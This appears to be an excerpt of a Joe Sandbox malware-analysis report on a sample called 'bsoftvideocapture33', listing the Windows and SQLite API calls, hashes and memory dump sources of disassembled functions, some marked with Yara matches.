                                                                                                                                        • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                                                                                        • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                                                                        • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                                                                                        • API String ID: 0-2604012851
                                                                                                                                        • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                                                                        • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                                                                                        • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                                                                        • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                                                                                        APIs
                                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00408640,00000001,00000000,00000000,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 00406409
                                                                                                                                        • LCMapStringA.KERNEL32(00000000,00000100,0040863C,00000001,00000000,00000000,?,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 00406425
                                                                                                                                        • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00405E87,?,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 0040646E
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 004064A6
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 004064FE
                                                                                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 00406514
                                                                                                                                        • LCMapStringW.KERNEL32(00000000,?,00405E87,00000000,00405E87,?,?,00405E87,00200020,00000000,?,00000000), ref: 00406547
                                                                                                                                        • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 004065AF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$ByteCharMultiWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 352835431-0
                                                                                                                                        • Opcode ID: 88284e932c36288a6156d60e9a075990b1961716adce78fc703b9783983f64f7
                                                                                                                                        • Instruction ID: c7c9367f903c863ede83e3d284d9543b54c612c6a1cea3deb7ec850cd2334311
                                                                                                                                        • Opcode Fuzzy Hash: 88284e932c36288a6156d60e9a075990b1961716adce78fc703b9783983f64f7
                                                                                                                                        • Instruction Fuzzy Hash: B0517B71900209FFCF229F58DD49A9F7BB9FB48750F11413AF912B12A0D7398961DBA8
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                                                                                        • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6095F180
                                                                                                                                          • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                                                                                          • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                                                        • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                                                                                        • String ID: |
                                                                                                                                        • API String ID: 1576672187-2343686810
                                                                                                                                        • Opcode ID: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                                                                        • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                                                                                        • Opcode Fuzzy Hash: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                                                                        • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                                                                                          • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                                                                                        • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                                                                                        • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                                                                                        • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                                                                                        • API String ID: 652164897-1572359634
                                                                                                                                        • Opcode ID: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                                                                        • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                                                                                        • Opcode Fuzzy Hash: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                                                                        • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403E3A
                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,00408574,00000000,?,00000000,00000000), ref: 00403F10
                                                                                                                                        • WriteFile.KERNEL32(00000000), ref: 00403F17
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$HandleModuleNameWrite
                                                                                                                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                        • API String ID: 3784150691-4022980321
                                                                                                                                        • Opcode ID: 32de02305071a764a4faeeef9d8dd67e214c7308779322260feaa114c606003d
                                                                                                                                        • Instruction ID: ed3ec3965d8bd69fc4b5d81f244bb244573f08a521b35bb9d91034c0cc4ce6b8
                                                                                                                                        • Opcode Fuzzy Hash: 32de02305071a764a4faeeef9d8dd67e214c7308779322260feaa114c606003d
                                                                                                                                        • Instruction Fuzzy Hash: 7A319072A002186FDF24EA60CE4AFEA776CAF45305F10057FF584B61D1DAB8AE448A5D
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                                                                                        • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                                                                                        • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                                                                                        • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2352520524-0
                                                                                                                                        • Opcode ID: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                                                                        • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                                                                                        • Opcode Fuzzy Hash: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                                                                        • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                                                                          • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                                                                          • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                                                                        • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                                                                                          • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                                                                        • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                                                                                          • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                                                                          • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                                                                          • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                                                                        • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                                                                                        • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                                                                                        • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                                                                                        • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                                                                        • String ID: optimize
                                                                                                                                        • API String ID: 3659050757-3797040228
                                                                                                                                        • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                                                                        • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                                                                                        • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                                                                        • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 60965556
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 609655B8
                                                                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                                                                        • sqlite3_malloc.SQLITE3 ref: 60965655
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60965714
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6096574B
                                                                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 609657AA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2722129401-0
                                                                                                                                        • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                                                                        • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                                                                                                        • Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                                                                        • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                                                                                          • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 609647C5
                                                                                                                                          • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6096476B
                                                                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6096477B
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60964783
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 571598680-0
                                                                                                                                        • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                                                                        • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                                                                                                        • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                                                                        • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                                                                                        APIs
                                                                                                                                        • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 0040372D
                                                                                                                                        • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 00403741
                                                                                                                                        • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 0040376D
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037A5
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037C7
                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037E0
                                                                                                                                        • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 004037F3
                                                                                                                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403831
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1823725401-0
                                                                                                                                        • Opcode ID: 29f2d76fac090216a30a5ebb2bb190fa98c47cf692b42f92f5f77d8145aa531c
                                                                                                                                        • Instruction ID: d646e254ae1f8dd71c5cd3670e2a02489b7ca9a5ac7c87ef76d14b342e535d81
                                                                                                                                        • Opcode Fuzzy Hash: 29f2d76fac090216a30a5ebb2bb190fa98c47cf692b42f92f5f77d8145aa531c
                                                                                                                                        • Instruction Fuzzy Hash: 3431D2F35082615ED7203F745D8483BBE9CEA4530AB15453FF981F3280DA795D4286A9
                                                                                                                                        APIs
                                                                                                                                        • OpenEventA.KERNEL32(00100002,00000000,00000000,4213E8DE), ref: 02C106C0
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C106D5
                                                                                                                                        • ResetEvent.KERNEL32(00000000,4213E8DE), ref: 02C106DF
                                                                                                                                        • CloseHandle.KERNEL32(00000000,4213E8DE), ref: 02C10714
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,4213E8DE), ref: 02C1078A
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C1079F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEventHandle$CreateOpenReset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1285874450-0
                                                                                                                                        • Opcode ID: 83618f0f666cc5b89656f60178e96bb7361ad36d29239f685b89b0960763d973
                                                                                                                                        • Instruction ID: 42be9c5df8d0984fdfc254f158d38faf8076f954321fbfebdb9622224d7a48a2
                                                                                                                                        • Opcode Fuzzy Hash: 83618f0f666cc5b89656f60178e96bb7361ad36d29239f685b89b0960763d973
                                                                                                                                        • Instruction Fuzzy Hash: CD415D70D00358ABDF20CBA5CC4ABAEB7B8BF46724F144619E818EB280D7709A45DF91
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 02C020AC
                                                                                                                                        • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C020CD
                                                                                                                                        • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C020D8
                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 02C0213E
                                                                                                                                        • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02C0217A
                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 02C02187
                                                                                                                                        • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C021A6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1171374749-0
                                                                                                                                        • Opcode ID: bf51d2f39d50deccbe88b74f8798b7f6c127c049868a2141ecf3691659335fb6
                                                                                                                                        • Instruction ID: 553f22fa137aa142aa58066c0ae6f52ff941789b7d8ea937c0a7cff281e88609
                                                                                                                                        • Opcode Fuzzy Hash: bf51d2f39d50deccbe88b74f8798b7f6c127c049868a2141ecf3691659335fb6
                                                                                                                                        • Instruction Fuzzy Hash: B7410A715047019FC325DF25D888A6BBBF9FFC8754F544A1EE89682690DB30E909CFA2
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02C10EE0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02C1073E,?,?), ref: 02C10F0F
                                                                                                                                          • Part of subcall function 02C10EE0: CloseHandle.KERNEL32(00000000,?,?,02C1073E,?,?), ref: 02C10F24
                                                                                                                                          • Part of subcall function 02C10EE0: SetEvent.KERNEL32(00000000,02C1073E,?,?), ref: 02C10F37
                                                                                                                                        • OpenEventA.KERNEL32(00100002,00000000,00000000,4213E8DE), ref: 02C106C0
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C106D5
                                                                                                                                        • ResetEvent.KERNEL32(00000000,4213E8DE), ref: 02C106DF
                                                                                                                                        • CloseHandle.KERNEL32(00000000,4213E8DE), ref: 02C10714
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 02C10745
                                                                                                                                          • Part of subcall function 02C131CA: RaiseException.KERNEL32(?,?,02C0EB64,?,?,?,?,?,?,?,02C0EB64,?,02C2ECA8,?), ref: 02C1321F
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,4213E8DE), ref: 02C1078A
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C1079F
                                                                                                                                          • Part of subcall function 02C10C20: GetCurrentProcessId.KERNEL32(?), ref: 02C10C79
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,4213E8DE), ref: 02C107AF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2227236058-0
                                                                                                                                        • Opcode ID: 1dff74ba3467570295e9a51ccabc69be743e99c7bf873b394a103a1dd8b98c84
                                                                                                                                        • Instruction ID: a1d8f58074941ac95fc30922a41b1fa355733426e0b64164f8806e4adbe63f2c
                                                                                                                                        • Opcode Fuzzy Hash: 1dff74ba3467570295e9a51ccabc69be743e99c7bf873b394a103a1dd8b98c84
                                                                                                                                        • Instruction Fuzzy Hash: 19316371D00358ABDF21DBA4DC46BADB7B9AF46314F144119EC18EB281D7309A45DF91
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                                                                          • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                                                                                        • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                                                                                        • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                                                                                        • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                                                                        • sqlite3_malloc.SQLITE3 ref: 609635BB
